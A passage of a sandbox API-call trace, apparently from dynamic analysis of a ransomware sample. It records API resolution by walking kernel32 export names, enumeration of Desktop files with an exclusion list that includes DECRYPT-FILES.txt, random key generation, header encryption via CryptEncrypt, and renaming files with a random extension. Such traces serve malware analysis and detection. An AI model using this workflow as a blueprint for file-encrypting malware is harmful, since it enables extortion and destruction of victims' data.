lstrlenA (lpString="CREATEPIPE") returned 10 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.572] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.572] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.572] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.572] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.572] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.572] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.572] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.572] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.572] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.572] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.572] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.572] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.573] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.573] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.573] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.573] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.573] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.573] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.573] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.573] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.573] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.573] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.573] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.573] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.573] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.573] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.573] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.573] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.573] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.573] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.573] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.573] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.574] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.574] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.574] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.574] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.574] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.574] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.574] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.574] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.574] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.574] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.574] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.574] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.574] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.574] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.574] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.574] lstrlenA (lpString="DELETEATOM") returned 10 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.574] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.574] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.574] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.575] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.575] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.575] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.575] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.575] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.575] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.575] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.575] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.575] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.575] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.575] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.575] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.575] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.575] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.575] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.575] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.575] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.575] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.575] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.576] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.576] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.576] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.576] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.576] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.576] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.576] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.576] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.576] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.576] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.576] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.576] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.576] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.576] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.576] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.576] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.576] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.576] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.576] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.577] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.577] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.577] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.577] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.577] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf") returned 52 [0083.577] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf.WYq3z") returned 58 [0083.577] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtegcks8v-.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf.WYq3z" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtegcks8v-.rtf.wyq3z"), dwFlags=0x0) returned 1 [0083.578] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.578] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.578] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.578] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b1fae0, ftCreationTime.dwHighDateTime=0x1d4cdaf, ftLastAccessTime.dwLowDateTime=0xde52fcf0, ftLastAccessTime.dwHighDateTime=0x1d4cc8e, ftLastWriteTime.dwLowDateTime=0xde52fcf0, ftLastWriteTime.dwHighDateTime=0x1d4cc8e, nFileSizeHigh=0x0, nFileSizeLow=0x4072, dwReserved0=0x0, dwReserved1=0x0, cFileName="qUqlKc5CiBNKH6.mkv", cAlternateFileName="QUQLKC~1.MKV")) returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="autorun.inf") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="boot.ini") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="desktop.ini") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="ntuser.dat") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="iconcache.db") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="bootsect.bak") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="ntuser.dat.log") returned 1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="thumbs.db") returned -1 [0083.578] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv", lpString2="Bootfont.bin") returned 1 [0083.579] lstrlenW (lpString="qUqlKc5CiBNKH6.mkv") returned 18 [0083.579] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0083.579] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0083.579] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0083.579] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0083.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.579] lstrlenW (lpString="qUqlKc5CiBNKH6.mkv") returned 18 [0083.579] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="qUqlKc5CiBNKH6.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv" [0083.579] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quqlkc5cibnkh6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.579] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=16498) returned 1 [0083.579] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.579] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.579] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.579] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.579] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.580] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.580] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.581] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.581] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.581] CloseHandle (hObject=0x414) returned 1 [0083.581] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.582] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.582] CloseHandle (hObject=0x0) returned 0 [0083.582] CloseHandle (hObject=0x410) returned 1 [0083.582] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.583] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.583] GetTickCount () returned 0x114d5d6 [0083.583] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.583] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.583] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.583] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.584] lstrlenA (lpString="kernel32.dll") returned 12 [0083.584] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.584] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.584] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.584] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.584] lstrlenA (lpString="ADDATOMA") returned 8 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.584] lstrlenA (lpString="ADDATOMW") returned 8 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, 